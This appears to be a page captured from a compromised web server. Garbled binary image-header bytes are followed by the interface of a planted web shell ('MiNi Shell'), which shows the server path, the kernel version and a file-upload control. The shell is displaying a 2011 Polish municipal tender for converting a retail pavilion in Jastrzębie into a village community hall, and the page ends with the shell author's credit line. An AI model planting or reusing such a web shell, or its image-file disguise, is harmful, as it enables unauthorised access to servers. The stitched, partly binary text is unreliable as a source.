JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111118/301073-N-2011.html

<p class="kh_header"><b>Namysłów: Przebudowa pawilonu handlowego na świetlicę wiejską w Jastrzębiu</b><br>
<b>Numer ogłoszenia: 301073 - 2011; data zamieszczenia: 18.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa , ul. Stanisława Dubois 3, 46-100 Namysłów, woj. opolskie, tel. 077 4190359, faks 077 4104841.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.namyslow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa pawilonu handlowego na świetlicę wiejską w Jastrzębiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa i kod wg Wspólnego Słownika Zamówień: Roboty budowlane w zakresie budynków wielofunkcyjnych  - 45211350-7. Zakres zamówienia obejmuje roboty budowlane i instalacyjnych wg projektu budowlanego i projektów branżowych i obejmuje: 1) roboty rozbiórkowe: demontaż stolarki i ślusarki otworowej; rozebranie ścianek działowych i podsufitki; przebudowa istniejących ścian zewnętrznych i wewnętrznych; rozbiórka schodów zewnętrznych; skucie istniejących tynków i okładzin wewnętrznych; rozbiórka attyki z płyt falistych; rozbiórka istniejącego podłoża pod posadzkami. 2) roboty budowlane: oczyszczenie i zabezpieczenie antykorozyjne konstrukcji dachu z kratowych wiązarów stalowych; wykonanie fundamentów i izolacji przeciwwilgociowej pod nowe ściany konstrukcyjne; wykonanie ścian konstrukcyjnych wewnętrznych; wykonanie podłoży podposadzkowych; wykonanie ścianek działowych wraz z izolacją przeciwwilgociową pod ściankami; przebudowa ścian zewnętrznych z wykonaniem otworów okiennych i drzwiowych wraz z zamontowaniem nadproży i podciągów; oczyszczenie stalowych elementów do 2 stopnia czystości i zabezpieczenie antykorozyjne; wykonanie konstrukcji mocującej centralę nawiewno
-wywiewną wraz z zabudową centrali i kanałów nawiewno-wywiewnych płytami GK i izolacją akustyczną wg zaleceń producenta; wykonanie zabudowy sufitu z płyt GKF 2x12,5 mm (w pomieszczeniach mokrych płyty wodoodporne) na ruszcie metalowym wraz z założeniem folii paraizolacyjnej i izolacji termicznej z wełny mineralnej grub. 20 cm - 252,08 m2 (uzupełnienie przedmiaru). 3) stolarka okienna i drzwiowa: montaż stolarki okiennej termoizolacyjnej z profili z wysokoudarowego PCV wraz z nawiewnikami okiennymi higrosterowanymi; montaż drzwi zewnętrznych termoizolacyjnych półpełnych z profili aluminiowych powlekanych; montaż drzwi wewnętrznych półpełnych z profili aluminiowych  powlekanych; montaż drzwi wewnętrznych pełnych i łazienkowych (z nawiewami dolnymi); montaż podokienników okiennych wewnętrznych z granitu polerowanego grub. 4 cm; montaż drzwi i drzwiczek stalowych do składu opału o EI 60. 4) tynki i okładziny wewnętrzne: wykonanie tynków wewnętrznych cementowo-wapiennych ścian kategorii III; wykonanie okładzin ściennych z płytek ceramicznych na zaprawie klejowej - kolorystyka płytek do uzgodnienia z zamawiającym - wykonanie malowania sufitów farbą emulsyjną; wykonanie malowanie ścian technologią natrysku kroplowego - kolorystyka do uzgodnienia z zamawiającym wraz z lakierowaniem lamperii do wysokości 1,50 m od poziomu posadzki. 5) posadzki i podłogi: wykonanie izolacji przeciwwilgociowej z folii podposadzkowej; wykonanie izolacji termicznej podposadzkowej z płyt styropianowych EPS 100 grubości 10 cm; wykonanie warstwy wyrównawczej posadzkowej z zaprawy cementowej; wykonanie posadzek z płytek ceramicznych antypoślizgowych układanych w caro - płytki dwubarwne 4 klasy ścieralności wg PN-ISO 13006:2001 - płytki typu gres porcelanowy z strukturalnym wykończeniem wierzchniej warstwy - kolorystyka do uzgodnienia z zamawiającym wraz z wykonaniem cokolików wysokość 10 cm w pomieszczeniach  bez okładziny ściennej z płytek; wykonanie podłogi z parkietu dębowego gatunek I wraz z zamontowaniem listew przyściennych i trzykrotnym lakierowaniem lakierem chemoutwardzalnym; wykonanie i montaż schodów wewnętrznych drewnianych na scenę  - przenośne. 6) elewacja i elementy zewnętrzne: demontaż obróbek blacharskich oraz rynien dachowych i rur spustowych z blachy ocynkowanej; demontaż drabiny kominiarskiej oraz attyki i podsufitki z płyty pilśniowej oraz krat stalowych; demontaż zwodów pionowych instalacji odgromowej wraz z wspornikami; uzupełnienie tynków zewnętrznych kategorii II; wykonanie podbitki okapu z listew boazeryjnych; wykonanie izolacji pionowej przeciwwilgociowej i termicznej murów fundamentowych; wykonanie docieplenia ścian zewnętrznych tzw. metodą lekką  z zastosowaniem styropianu grubość 14 cm i gotowego tynku akrylowego cienkowarstwowego - kolory intensywne - do uzgodnienia z zamawiającym - dodatkowa warstwa siatki na wysokość do 2,0 m od poziomu; przyległego terenu; montaż parapetów zewnętrznych z  płyt granitowych polerowanych grubość 4 cm - z kapinosem; montaż obróbek blacharskich z blachy ocynkowanej; montaż rynien dachowych i rur spustowych - rynny i rury z odzysku; montaż drabiny włazowej na dach 
z kabłakami z stalowej ocynkowanej malowanej proszkowo; montaż (uzupełnienie) instalacji odgromowej wraz z wykonaniem pomiarów instalacji odgromowej; pokrycie jednowarstwowe dachu papą termozgrzewalną grubość min. 5 mm modyfikowana SBS z wkładką poliestrową o gramaturze min. 200g/m2. 7) schody zewnętrzne i pochylnia dla niepełnosprawnych: wykonanie fundamentów żelbetowych i ścian fundamentowych oraz ścian oporowych nadziemia z bloczków betonowych grubość 25 cm;  wykonanie izolacji przeciwwilgociowych; wypełnienie przestrzeni pod schody i pochylnię z pospółki zagęszczonej oraz wykonanie podłoża betonowego z betonu B-15; wykonanie okładziny schodów z płytek ceramicznych antypoślizgowych na zaprawie mrozoodpornej - płytki dwubarwne 4 klasy ścieralności wg PN-ISO 13006:2001 - płytki typu gres porcelanowy z strukturalnym wykończeniem wierzchniej warstwy - podstopnie o innej barwie - kolorystyka do  uzgodnienia z zamawiającym; wykonanie nawierzchni pochylni z kostki betonowej grubość 6 cm na podsypce cementowo - piaskowej; wykonanie okładziny ścianek pochylni i schodów z płytek klinkierowych 6 x 25 cm na zaprawie klejowej mrozoodpornej; montaż balustrady pochylni z rur stalowych ze stali nierdzewnej  O 50 mm - słupki i pochwyty - zgodnie z stosownymi przepisami; montaż balustrad schodowych z rur stalowych ze stali nierdzewnej - słupki i pochwyty O 50mm, wypełnienie balustrad O 20 mm w rozstawie pomiędzy szczeblinami co 10 cm.
8) roboty instalacyjne: demontaż istniejących instalacji; wykonanie instalacji elektrycznej wraz z montażem osprzętu elektrycznego; wykonanie instalacji wodno-kanalizacyjnej wraz z montażem osprzętu sanitarnego; wykonanie instalacji centralnego ogrzewania wraz z montażem osprzętu i kotła c.o.; wykonanie instalacji mechanicznej nawiewno-wywiewnej; wykonanie przyłącza wodociągowego wraz z hydrantem zewnętrznym. 9) zagospodarowanie: wycinka 3 drzew o średnicy pnia 66-75 cm wraz z karczowaniem pni i wywiezieniem urobku na odległość do 7 km; rozbiórka istniejących nawierzchni utwardzonych z płytek betonowych oraz betonowych wylewanych na mokro; wykonanie korytowania 
pod projektowane nawierzchnie utwardzone; wykonanie nawierzchni dróg dojazdowych wewnętrznych, dojść do budynku oraz miejsc parkingowych z kostki betonowej na podbudowie z tłucznia kamiennego i warstwie odsączającej z pospółki zagęszczonej oraz zamknięciem nawierzchni krawężnikiem betonowym 15x30x100 cm na ławie betonowej z oporem z betonu B-15 z zastosowaniem krawężników łukowych i najazdowych na wjazdach; stanowiska parkingowe wydzielone pasami z kostki w kolorze czarnym (grafitowym); uporządkowanie terenów przyległych i humusowanie z obsianiem trawą. 10) wyposażenie: zakup, dostawa i montaż wyposażenia sali, biur, szatni oraz kuchni z zapleczem - wg wykazu przedstawionego w przedmiarze. Wykonawca robót zobowiązuje się do wykonania badań i sprawdzeń wykonanych instalacji; dostarczenia zamawiającemu kompletności dokumentacji powykonawczej, w tym aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane materiały budowlane 
i instalacyjne, protokoły sprawdzenia i odbioru. Wykonawca sporządzi i dostarczy Zamawiającemu kosztorys powykonawczy (i ewentualnego kosztorysu różnicowego) w dwóch egzemplarzach i jednym egzemplarzu w wersji elektronicznej 
w PDF i programie NORMA lub kompatybilnym z tym programem. Przed złożeniem oferty należy zapoznać się z projektem budowlanym  w celu ujęcia w kalkulacji pełnego zakresu robót podstawowych i pomocniczych dla właściwego sporządzenia kalkulacji i wykonania kompletności zamówienia. Szczegóły przedmiotu zamówienia przedstawiają załączone przedmiary robót i dokumentacja techniczna. Zmiana terminu zakończenia realizacji przedmiotu zamówienia może mieć miejsce w przypadku wystąpienia warunków atmosferycznych uniemożliwiających wykonanie robót pod warunkiem, że fakt ten ma odzwierciedlenie w dzienniku budowy i został potwierdzony przez Koordynatora ze strony Zamawiającego. Na roboty jw. wykonawca udzieli gwarancji na okres 3 lat licząc od daty  protokołu odbioru robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.50-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 13.200,00 zł (słownie złotych: trzynaście  tysięcy dwieście 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże,
że  dysponuje kierownikiem budowy w specjalności konstrukcyjno-budowlanej oraz kierownikiem robót branżowych w specjalności instalacje wod.-kan., c.o., wentylacji oraz instalacji elektrycznych, który będzie uczestniczył w wykonywaniu zamówienia. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez Wykonawcę, podmioty występujące wspólnie) dokumentów wymienionych w punkcie 6 specyfikacji istotnych warunków zamówienia według formuły spełnia - nie spełnia. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, z podaniem zakresu i sposobu tego udostępniania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o dysponowaniu zasobami niezbędnymi do realizacji zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminu realizacji przedmiotu zamówienia może mieć miejsce w przypadku wystąpienia warunków atmosferycznych uniemożliwiających wykonanie robót, pod warunkiem, że fakt ten ma odzwierciedlenie w dzienniku budowy i został potwierdzony przez Koordynatora ze strony Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.namyslow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia dostępna będzie w siedzibie Zamawiającego, budynek B, pok. nr 26 lub za zaliczeniem pocztowym. Siwz jest odpłatna (36,60 zł).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 11:00, miejsce: Oferty należy składać w siedzibie Zamawiającego - Urząd Miejski w Namysłowie, ul. Dubois 3, budynek A, w sekretariacie, pokój Nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 z udziałem środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com